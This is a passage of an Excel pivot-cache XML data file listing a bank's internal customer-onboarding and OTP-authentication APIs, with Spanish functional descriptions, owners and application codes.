comparación de los datos suministrados por el cliente versus los datos entregados por la fuente externa.  El puntaje de coincidencia es un valor que se compara contra los umbrales parametrizados dentro del componente y éstos pueden variar de acuerdo al escenario de vinculación y las necesidades del negocio. Para definir si la validación de identidad es exitosa se tienen en cuenta las siguientes premisas: Escenario 1: El puntaje de coincidencia está entre el umbral mí­nimo y máximo parametrizados, en este caso, se debe llevar a cabo la activación de preguntas reto. La operación entrega esta instrucción en la respuesta. Escenario 2: El puntaje de coincidencia está por encima del umbral máximo parametrizado, en este caso la validación de identidad es exitosa, el potencial cliente puede continuar el proceso de vinculación sin aplicar las operaciones de preguntas reto, el estado de éstas se marca como &quot;Completado Automáticamente&quot;. Escenario 3: El puntaje de coincidencia está por debajo del umbral mí­nimo parametrizado, en este caso la validación de identidad NO es exitosa, no se puede continuar con el proceso y se cancela la solicitud de vinculación. - Cuando el documento de identidad no está vigente de acuerdo a los datos entregados por la fuente externa, esta capacidad cancela la solicitud sin activar la comparación de datos. - Cuando la Operación &quot;Cargar documentos&quot; se encuentra en estado &quot;Diligenciar manualmente&quot;, es obligatorio el llamado a las operaciones de Preguntas reto. - Cuando el celular y/o correo electrónico no coincidan con la fuente externa Experian, es obligatorio el llamado a las operaciones de Preguntas reto. ###### **Exponer Preguntas Reto** Esta operación se activa de acuerdo al resultado de la operación Validar Identidad para asegurar la validación de identidad del potencial cliente. Así­ mismo, se activa:  - Cuando el puntaje de coincidencia está entre el umbral mí­nimo y máximo   - Cuando el potencial cliente no está registrado en Experian  - Cuando la información del documento de identidad debe diligenciarse manualmente  - Cuando el celular y/o correo electrónico no coinciden con los reportados en Experian  Premisas de la Operación Exponer Preguntas Reto: - La operación Exponer Preguntas Reto permite generar y presentar un cuestionario de 4 preguntas con 4 opciones de respuesta cada una, éstas son generadas de manera aleatoria basadas en el historial crediticio e información del potencial cliente registrada en las centrales de riesgo.  - El potencial cliente debe seleccionar la respuesta correcta dentro de un conjunto de opciones disponibles y  éstas se entregan para su validación a la operación Validar Preguntas Reto. - El Servicio de Experian cuenta con un níºmero máximo de intentos parametrizada para la generación de preguntas reto, por dí­a, mes y aí±o, cuando éste se supera, se cancela la solicitud de vinculación y se genera un bloqueo temporal sobre el potencial cliente, evitando que intente crear nuevas solicitudes a través del Componente. Lo anterior se realiza con el propósito de no generar gastos adicionales a raí­z de las consultas a Experian, teniendo en cuenta que el proveedor continuará enviando error por los intentos superados hasta que se cumpla el tiempo de bloqueo. ###### **Validar Preguntas Reto** A través de esta operación es posible validar la identidad del potencial cliente verificando la consistencia de las respuestas entregadas a las preguntas expuestas previamente en la operación Exponer Preguntas Reto y es Experian quien informa si se aprueba o no la validación de identidad."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-06T14:44:59"/>
    <s v="CustomerAcquisitionDocs"/>
    <n v="101"/>
    <s v="Customer Acquisition Images And Documents Management"/>
    <n v="100"/>
    <s v="customer-acquisition-images-and-documents-management"/>
    <s v="## **Descripción:** Esta API habilita las capacidades para generar y exponer el formato de conocimiento del cliente en el proceso de vinculación. De igual forma, permite ejecutar la firma electrónica y custodia del formato previamente diligenciado con la información ingresada por el potencial cliente en la API Customer Acquisition Information PN. Antes de habilitar el llamado a esta API, se deben consumir las capacidades de la API Information PN. ## **Operaciones**  ###### **Generar y exponer documentos:** A través de esta operación es posible consolidar, en una plantilla .pdf del formato de conocimiento del cliente, la información recolectada mediante las operaciones de la API Customer Acquisition Information PN, como soporte del proceso de vinculación.  El formato se guarda temporalmente en el componente  y se genera una URL que lo expone al consumidor, ésta tiene un tiempo de vigencia de 5 minutos, pasado este tiempo la URL expira.   Esta operación genera 2 copias del formato de conocimiento del cliente, una versión encriptada que se comparte al cliente a ví­a correo electrónica y otra que se firma electrónicamente y se custodia en el repositorio oficial del Banco. Posteriormente, será posible incorporar nuevas plantillas para los escenarios de conocimiento del cliente que se vayan habilitando en el componente. ###### **Firmar y custodiar documentos:** A través de esta operación es posible firmar electrónicamente el formato de conocimiento del cliente generado en la experiencia de vinculación, este es el soporte jurí­dico del proceso.  Esta operación hace uso de la API Document Management - Digital Signature_v1.0.0 Premisas de la Operación Firmar y custodiar documento: * Se debe asegurar la ejecución exitosa de las operaciones prerrequisito, entre ellas, generar y validar token, generar y exponer documentos y las demás parametrizadas en el componente. * Asegura la generación del archivo de trazabilidad a adjuntar en el formato de conocimiento del cliente para garantizar las condiciones de no repudio.   * La API a reusar es responsable de asegurar la custodia del formato de conocimiento del cliente, así­ mismo, es la encargada de controlar los reintentos en caso de falla."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T15:15:02"/>
    <s v="Customer Acquisition Data"/>
    <n v="100"/>
    <s v="Customer Acquisition Information NP"/>
    <n v="100"/>
    <s v="customer-acquisition-information-np"/>
    <s v="## **Descripción:** Es la API que habilita las capacidades para capturar los datos del cliente o potencial cliente Persona Natural, con el fin de obtener los datos necesarios para los procesos de conocimiento del cliente y dar cumplimiento a las exigencias normativas. En ese orden de ideas, el cliente o potencial cliente suministra sus datos personales, básicos, de contacto, económicos, tributarios y de moneda extranjera, los cuales también son necesarios para entender su contexto. Posteriormente, esta API contará con la capacidad de precargar información del cliente o potencial cliente a partir de fuentes internas y externas avalados por el banco, buscando minimizar la cantidad de información que debe diligenciar en los proceso de conocimiento del cliente. Premisas de la API Customer Acquisition Information NP: '¢Todos los campos de la captura de información son opcionales dentro del mapeo de datos de entrada de las operaciones (Exceptuando el Acquisition ID, el tipo y níºmero de documento), sin embargo, dependiendo del escenario del proceso de conocimiento del cliente que aplique, el Componente validará su obligatoriedad. '¢Adicionalmente, si una vez finalizada la captura de información, el cliente o potencial cliente desea modificar algíºn campo, se podrán realizar consumos posteriores a las operaciones para entregar la información a modificar. Sin embargo, se debe tener presente que la actualización de los campos usados en validaciones internas está sujeta a la parametrización del escenario que le aplique al cliente o potencial cliente. ## **Operaciones**  ###### **Capturar Información Personal** A través de esta operación el cliente o potencial cliente suministra sus datos personales al proceso de conocimiento del cliente, estos datos corresponden a los encontrados en el documento de identidad y datos de contacto básicos que permitirán habilitar, entre otros procesos, la validación de identidad. Premisas de Capturar Información Personal: - Los datos del documento de identidad serán de obligatorio diligenciamiento en los escenarios de vinculación donde no se realiza procesamiento del documento de identidad. - Para los escenarios de vinculación que requieren digitalización del documento de identidad, se ejecuta el diligenciamiento automático de los campos asociados al documento en esta operación y éstos serán visibles en el formato de conocimiento del cliente. - Los datos de contacto básicos corresponden al celular y correo electrónico asociados al tipo de dirección residencial, estos datos se validan contra el resto de las solicitudes de vinculación activas en el componente, en caso de estar asociados a otra solicitud (el mismo níºmero de celular y/o el mismo correo electrónico), se procede a generar una error para solicitar la modificación de los datos por sospecha de pitufeo, siempre y cuando se iguale o supere el parámetro Níºmero Máximo de Solicitudes Activas con un mismo correo electrónico y/o níºmero de celular. ###### **Capturar Información Básica** A través de esta operación,  el cliente o potencial cliente suministra sus datos básicos para los procesos de conocimiento del cliente, éstos corresponden a información sociodemográfica y algunos datos del documento de identidad. ###### **Capturar Información de Contacto** A través de esta operación el cliente o potencial cliente suministra sus datos de contacto para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información de Contacto: - La operación permite el ingreso de dos tipos de dirección: residencial o laboral.  - Un cliente o  potencial cliente solo podrá tener una dirección de cada tipo y solo una podrá estar marcada como dirección de correspondencia.  - El celular y correo electrónico asociados a la dirección residencial serán los que se ingresen en la operación Capturar Datos Personales y no se permitirá su modificación al hacer el llamado a la operación Capturar datos contacto. ###### **Capturar Información Económica** A través de esta operación el cliente o potencial cliente suministra sus datos económicos para llevar a cabo los procesos de conocimiento del cliente que apliquen. Tanto en esta operación como en Capturar Información Tributaria algunos campos cambiarán su obligatoriedad de acuerdo a la ocupación que ingrese el cliente o potencial cliente, este comportamiento es parametrizable para cada escenario. ###### **Capturar Información Tributaria** A través de esta operación el cliente o potencial cliente suministra sus datos tributarios y otros datos requeridos por normatividad SARLAFT para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información Tributaria - En esta operación se diligencia la información para la autocertificación fiscal de FATCA y CRS, la operación está en capacidad de recibir la autocerficacion tanto de FATCA como de CRS en dos preguntas independientes, sin embargo inicialmente se integraron en una sola pregunta que aborda ambas normativas y se expone en el formato F-2486, de acuerdo a la respuesta de esta pregunta el cliente o potencial cliente podrá relacionar la lista de paí­ses y sus IDs tributarios correspondientes. - La obligatoriedad de los campos paí­s y ID tributario dependerá de la respuesta dada por el cliente o potencial cliente a la pregunta de tributa o no como residente o ciudadano en los Estados Unidos o en otros paí­ses diferentes a Colombia. - Tanto en esta operación como en Capturar Información Económica algunos campos cambiarán su obligatoriedad de acuerdo a la ocupación que ingrese el cliente o potencial cliente, este comportamiento es parametrizable para cada escenario. ###### **Capturar Información de Moneda Extranjera** A través de esta operación el cliente o potencial cliente suministra sus datos de moneda extranjera para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información de Moneda Extranjera: - Si el cliente o potencial cliente realiza operaciones en moneda extranjera, deberá relacionar de forma obligatorio el detalle de sus operaciones y productos.  - La operación solo admite un registro por cada tipo de transacción indicada."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-04T11:00:23"/>
    <s v="Customer Acquisition"/>
    <n v="110"/>
    <s v="Customer Acquisition Management"/>
    <n v="110"/>
    <s v="customer-acquisition-management"/>
    <s v="## **Descripción:** Es la API principal del proceso de vinculación de clientes pues corresponde al punto de entrada a una nueva vinculación. Habilita las capacidades para iniciar un proceso de vinculación, verificar su estado, consultar cuáles son las instrucciones y cláusulas y su aceptación/declinación.  Todo proceso de vinculación debe obligatoriamente iniciar por esta API, la cual proporciona un ID íºnico de vinculación que será necesario para consumir las demás APIs requeridas en el proceso y de esta manera llevar el control y la trazabilidad de éste. ## **Operaciones**  ###### **Iniciar vinculación:** A través de esta operación se da inicio a una nueva solicitud de vinculación; se recibe por parte de los canales/consumidores un set de parámetros que permiten perfilar el tipo de vinculación que se debe realizar, es decir, le permite al Componente Transversal de Vinculación identificar las actividades que deben ser completadas para vincular correctamente a un potencial cliente.  La operación Iniciar Vinculación, retorna el Id íºnico de vinculación el cual permite llevar el control y trazabilidad del proceso, un potencial cliente puede tener varias solicitudes de vinculación activas, cada una con diferente Id, siempre y cuando el producto, canal o lí­nea de negocio sean diferentes. Premisas de Iniciar Vinculación:  - Si un potencial cliente tiene varias solicitudes activas, cuando una de ellas finalice exitosamente, las otras se marcarán automáticamente como canceladas.  - Si un potencial cliente inicia una vinculación y ya tiene una activa con el mismo producto, canal o lí­nea de negocio, el Componente no permitirá crearla de forma exitosa, en su lugar, retornará una excepción de negocio alertando sobre esta situación y brindandole al potencial cliente la opción de retoma o la opción de esperar a que ésta se cancele automáticamente por vigencia.  - Una solicitud de vinculación tendrá una vigencia de 24 horas (tiempo parametrizable a nivel funcional con previa validación y aprobación del área Jurí­dica, de Seguridad y Cumplimiento), contadas a partir de la fecha y hora de creación de la misma, cumplido este tiempo, si la vinculación aun se encuentra activa, se marcará automáticamente como 'Cancelada por vigencia'?. ###### **Consultar instrucciones y cláusulas:** A través de esta operación, es posible indicarle al consumidor cuáles son los documentos requeridos y cláusulas para el proceso de vinculación, dependiendo del escenario de vinculación pueden presentarse variaciones en las instrucciones y cláusulas a presentar. ###### **Aceptar cláusulas:** A través de esta operación se proporciona un mecanismo de aceptación de cláusulas al proceso de vinculación iniciado; es posible recibir dos respuestas, SI (Aceptación de cláusulas) o NO (No aceptación de cláusulas). ###### **Consultar estado de la solicitud:** A través de esta operación es posible conocer el estado actual de una solicitud de vinculación y de todas sus actividades/steps/operaciones. Premisas de la Operación Consultar estado de la solicitud: Una solicitud de vinculación puede tener los siguientes estados:   **Activo:**  Estado de la solicitud cuando tiene actividades pendientes por completar.  **Cancelado:**  Estado de la solicitud que se asigna  cuando ésta se interrumpe en alguna etapa del proceso, puede darse por cualquiera de las siguientes causales:   - El potencial cliente no acepta cláusulas.   - El potencial cliente no superó exitosamente las validaciones del proceso (Listas de control, validación de identidad, calificación de riesgo LAFT, etc.) o se presentaron fallas en el reuso de servicios.   - Hubo otra solicitud de vinculación con variables de entrada diferentes que finalizó correctamente. (Producto, canal, lí­nea de negocio  **Finalizado:** Estado de la solicitud que se asigna cuando se han completado todas las actividades parametrizadas en el escenario de vinculación correctamente.   Las solicitudes que ingresan al Componente y se perfilan como 'Actualizar cliente'? o 'Apertura de Producto'?, también quedan en estado Finalizado.  **Cancelado por vigencia:** Estado de la solicitud que se asigna cuando han pasado 24 horas a partir de la creación de la solicitud y ésta aun se encontraba activa. Esta es una directriz desde seguridad y es un valor parametrizable.  **Pendiente marcación:** Estado de la solicitud que se asigna cuando al realizar la calificación de riesgo LAFT ésta indica que el potencial cliente no es apto para continuar con el proceso de vinculación, se deja en este estado para asegurar que se consuma la operación Marcar Cliente en Listas de Control, evitando así­ que el potencial cliente cree una nueva solicitud y modifique los datos de entrada que dieron lugar a la calificación no apta.  **Pendiente publicación:** Estado de la solicitud que se asigna cuando falla la publicación en Oracle de los documentos soporte de la vinculación y es el mecanismo que permite identificar las solicitudes a incluir en el proceso batch de reintentos de publicación.  **Pendiente notificación:** Estado de la solicitud que se asigna cuando falla el enví­o de la notificación al cliente  ví­a email con el formato de conocimiento adjunto y se requiere para monitoreo y gestiones posteriores desde la operación. Una actividad/paso/step/operación puede tener los siguientes estados:   **Pendiente:** Estado que indica que la actividad/operación/paso está en proceso o no ha sido iniciada.  **Completado:** Estado que indica que la actividad/operación/paso ha sido finalizada de manera exitosa.  **Rechazado:** Estado que indica que el potencial cliente no superó exitosamente las validaciones de la actividad/operación/paso.  **Escalado:** Estado exclusivo para la etapa de validación de identidad, con este estado se indica que el potencial cliente no finalizó exitosamente la primera etapa y se escala a una segunda etapa para validad su identidad con preguntas reto.  **Bloqueado:** Estado exclusivo para las operaciones de generar y validar token cuando se superaron los intentos permitidos para la generación y envió del OTP o su validación. Se bloquea temporalmente las operaciones por directriz de seguridad.   **Completado Automáticamente:** Estado que se aplica a las operaciones de generar  y validar preguntas reto, cuando el potencial cliente supera satisfactoriamente la validación de identidad en la etapa 1.  O en la operación de cargar documento cuando de acuerdo a la ocupación del potencial cliente no requiere aportar el RUT como documento soporte.   **Completado Parcialmente:** Estado para indicar avance de operaciones/actividades que se deben consumir en varios momentos del proceso.  Aceptar clausulas: Se marca en este estado cuando se acepta una de las cláusulas y aun quedan clausulas pendientes por aceptar.  Cargar documentos: Se marca en este estado cuando se procesa exitosamente el primer documento soporte de la vinculación.  **Diligenciar Manualmente:** Estado exclusivo para la etapa del cargue de documento de identidad e indica que kofax procesó parcialmente el documento, se requiere que el cliente diligencie manualmente algunos de los campos del documento para continuar."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <n v="1"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-04T11:00:23"/>
    <s v="Customer Acquisition"/>
    <n v="110"/>
    <s v="Customer Acquisition Profiling"/>
    <n v="110"/>
    <s v="customer-acquisition-profiling"/>
    <s v="## **Descripción:** La API Customer Acquisition Profiling habilita las capacidades para perfilar al cliente desde el punto de vista de negocio, identificando el proceso que le aplica:  Actualización, Vinculación o Apertura de producto cuando no requiere ninguna gestión de Conocimiento del Cliente. Así­ mismo identifica si el potencial cliente a vincular es exclusivo de BALM a partir del segmento registrado en los maestros de clientes. Esta API también permite realizar la segmentación comercial del potencial cliente. ## **Operaciones**  ###### **Perfilar Cliente:** Permite realizar la perfilación de negocio al potencial cliente, con el objetivo de identificar cuál es la acción a seguir en el proceso.  Las acciones a seguir pueden ser las siguientes:   * Vincular Prospecto  * Vincular prospecto - Exclusivo BALM  * Actualizar Cliente  * Apertura Producto, en caso de que no requiera gestiones de conocimiento del cliente. Esta operación hace uso de los servicio de MDM Consulta Básica de Clientes y Datos de Gestión Comercial. ###### **Segmentar Cliente:** Permite realizar la segmentación comercial al potencial cliente, la cual se determinará de acuerdo con sus diferentes variables financieras, económicas, etc. retornando el segmento al cual quedó asignado.  El segmento es un dato necesario para registrar al potencial cliente en el maestro de clientes. Actualmente esta operación permite ejecutar la calificación de riesgo LAFT, para identificar si el potencial cliente es apto o no para continuar con el proceso de vinculación. Esta operación hace uso del servicio Gestionar Prospectos de SAP CRM para realizar el primer registro/modificación del potencial cliente en el sistema. Para hacer uso de esta capacidad es necesario que previamente se hayan capturado los datos del potencial cliente: Personales, básicos, de contacto, económicos, tributarios y de moneda extranjera."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T14:51:25"/>
    <s v="Customer Acquisition Security"/>
    <n v="100"/>
    <s v="Customer Acquisition Validation"/>
    <n v="100"/>
    <s v="customer-acquisition-validation"/>
    <s v="## **Descripción:** Es la API que habilita las capacidades para ejecutar las validaciones requeridas para adelantar los procesos de conocimiento del cliente dando cumplimiento a la normatividad SARLAFT, aportando a la reducción de riesgos en los procesos, además de dar cumplimiento a los lineamientos del modelo de firma electrónica acogido el Banco. Posteriormente, en este producto de APIs se incorporará la capacidad para validar la consistencia del representante legal de un cliente o potencial cliente Persona Jurí­dica, además la calificación de riesgo LAFT a través de SCOVIC. Premisas de la API Customer Acquisition Validation: * La validación en listas de control es obligatoria para los escenarios de vinculación parametrizados en el Componente de Vinculación, para ello se realizan dos consultas en los reportes de listas, una por tipo y níºmero de documento y otra por nombre completo. Es importante tener presente que inicialmente el Componente no admitirá la vinculación para potenciales clientes que figuren con alerta o bloqueo en listas de control, estas solicitudes se cancelan automáticamente. * La marcación de clientes NO objetivo inicialmente se aplica para potenciales clientes que no sean aptos para continuar el proceso de vinculación debido a su calificación de riesgo LAFT, esta operación es obligatoria para todos los escenarios que estén parametrizados en el Componente. * La generación y validación de token es de caracter obligatorio para todos los procesos de conocimiento del cliente que exijan firma electrónico en los formatos generado durante la experiencia. ## **Operaciones**  ###### **Validar Listas de Control** A través de esta operación es posible identificar si el potencial cliente o representante legal, se encuentra reportado en alguna categorí­a de listas de control, haciendo uso del servicio Check Control List/Servicio de Listas de Control. El resultado de la validación puede tener los siguientes valores: * El potencial cliente no se encuentra reportado en listas de control.  * El potencial cliente se encuentra reportado en listas de control en categorí­a de alertas.  * El potencial cliente se encuentra reportado en listas de control en categorí­a de bloqueos. Premisas de Validar Listas de Control: - Es una operación de consumo obligatorio en los escenarios parametrizados en el Componente. - Esta operación se debe consumir después de capturar el nombre completo del cliente, preferiblemente desde el documento de identidad, es decir, se debe ejecutar posterior a la operación Cargar documentos con el documento de identidad. - En la respuesta entregada al consumidor se detalla, en caso de encontrar al potencial cliente reportado en listas de control, si corresponde a alerta o bloqueo y la categorí­a en la cual se encuentra marcado. **Esta información es de caracter confidencial y por ningíºn motivo se debe entregar al cliente o potencial cliente.** ###### **Marcar Cliente No Objetivo** A través de esta operación, se valida si el cliente o potencial cliente debe ser marcado en listas de control por novedades asociadas a la detección de clientes no objetivo para el Banco, ésta es de consumo obligatorio para cualquier escenario de vinculación parametrizado en el Componente. Un cliente o potencial cliente identificado como &quot;no objetivo&quot; es aquel que presenta comportamientos atí­picos o inconsistencias en la información suministrada durante el proceso de conocimiento del cliente. Esta operación hace uso de una API externa al Componente denominada Control List Management. Inicialmente esta marcación se aplicará sobre aquellos potenciales clientes cuya calificación SARLAFT no es apta para llevar a cabo el proceso de vinculación a través del Componente, de esta manera garantizamos que el potencial cliente no pueda crear una nueva solicitud modificando los datos y que los equipos comerciales identifiquen los potenciales clientes que iniciaron un proceso de vinculación por el Componente y requieren mayor debida diligencia.  Posteriormente, se espera que cuando falle la verificación de identidad, se detecte la entrega de información fraudulenta, o desde fuentes externas se identifique que el potencial cliente es fraudulento, se espera marcarlo en una lista de control como cliente no objetivo y no se permitirá continuar con el proceso de conocimiento del cliente. ###### **Generar Token** A través de esta operación es posible generar un código o token para validar al potencial cliente mediante el mecanismo OTP (One-Time Password). Inicialmente, esta operación será usada para firmar electrónicamente el Formato de Conocimiento del Cliente. Esta operación hace uso de una API externa al Componente denominada Token - Management. Premisas de Generar Token: - El token es enviado al correo electrónico y ví­a SMS al celular entregados por el potencial cliente. - Previo a la generación del token, el Componente valida que el cliente o potencial cliente tenga una solicitud  activa.   - Si no se especifica un correo o níºmero de celular en la entrada de la operación, el Componente valida si previamente ya se han capturado estos datos en algíºn paso anterior en el proceso de conocimiento del cliente, en caso de no encontrar datos se lanza un error  indicando que no se ha especificado un correo o níºmero de celular para el enví­o del token. Tienen prioridad los datos ingresados previamente a través del Producto Customer Acquisition Data. - Por restricciones a nivel de seguridad, esta operación cuenta con un níºmero máximo de intentos parametrizados, una vez el cliente o potencial cliente supere el níºmero de intentos, se genera un bloqueo que impide la generación del token durante un tiempo parametrizable. - Es posible parametrizar las actividades/operaciones prerrequisito para el consumo de la operación Generar Token en los diferentes escenario de conocimiento del cliente parametrizados en el Componente.   ###### **Validar Token** A través de esta operación es posible comprobar si el token ingresado por el cliente o potencial cliente es válido, verificando su existencia y vigencia.  Una vez se compruebe la validez del token, es posible afirmar que el potencial cliente ha tenido una validación exitosa. Esta operación hace uso de una API externa al Componente denominada Token - Management. Premisas de Validar Token: - El cliente o potencial cliente debe ingresar durante la experiencia, el token enviado al correo electrónico y ví­a SMS al celular que suministró previamente. - Previo a la validación del token, el Componente valida que el cliente o potencial cliente tenga una solicitud  activa.   - Por restricciones a nivel de seguridad, esta operación cuenta con un níºmero máximo de intentos parametrizados, una vez el cliente o potencial cliente supere el níºmero de intentos, se genera un bloqueo que impide la validación del token durante un tiempo parametrizable. - Es posible parametrizar las actividades/operaciones prerrequisito para el consumo de la operación Validar Token en los diferentes escenario de conocimiento del cliente parametrizados en el Componente. Es obligatorio ejecutar la operación Generar Token previo a la validación del mismo."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-04T22:03:28"/>
    <s v="Customer Authentication"/>
    <n v="104"/>
    <s v="Customer Authentication - OTP"/>
    <n v="102"/>
    <s v="customer-authentication-otp"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <s v="EnrolarClienteOTP/V2.0, _x000a_AutenticarClienteOTP/V2.0_x000a_GenerarOTP/V2.0"/>
    <s v="Cyxtera"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ PEP_AW1128"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-07T14:47:33"/>
    <s v="Customer Authentication"/>
    <n v="101"/>
    <s v="Customer Authentication - OTP"/>
    <n v="101"/>
    <s v="customer-authentication-otp"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="EASYHOME_NU0004001"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-25T16:45:22"/>
    <s v="Customer Authentication"/>
    <n v="200"/>
    <s v="Customer Authentication - Otp"/>
    <n v="200"/>
    <s v="customer-authentication-otp"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PEP_AW1128"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-25T23:05:23"/>
    <s v="Customer Authentication"/>
    <n v="100"/>
    <s v="Customer Authentication - OTP"/>
    <n v="100"/>
    <s v="customer-authentication-otp"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <s v="EnrolarClienteOTP/V2.0_x000a_AutenticarClienteOTP/V2.0_x000a_GenerarOTP/V2.0_x000a_"/>
    <m/>
    <s v="No tiene"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-12-04T03:13:45"/>
    <s v="Customer Authentication"/>
    <n v="104"/>
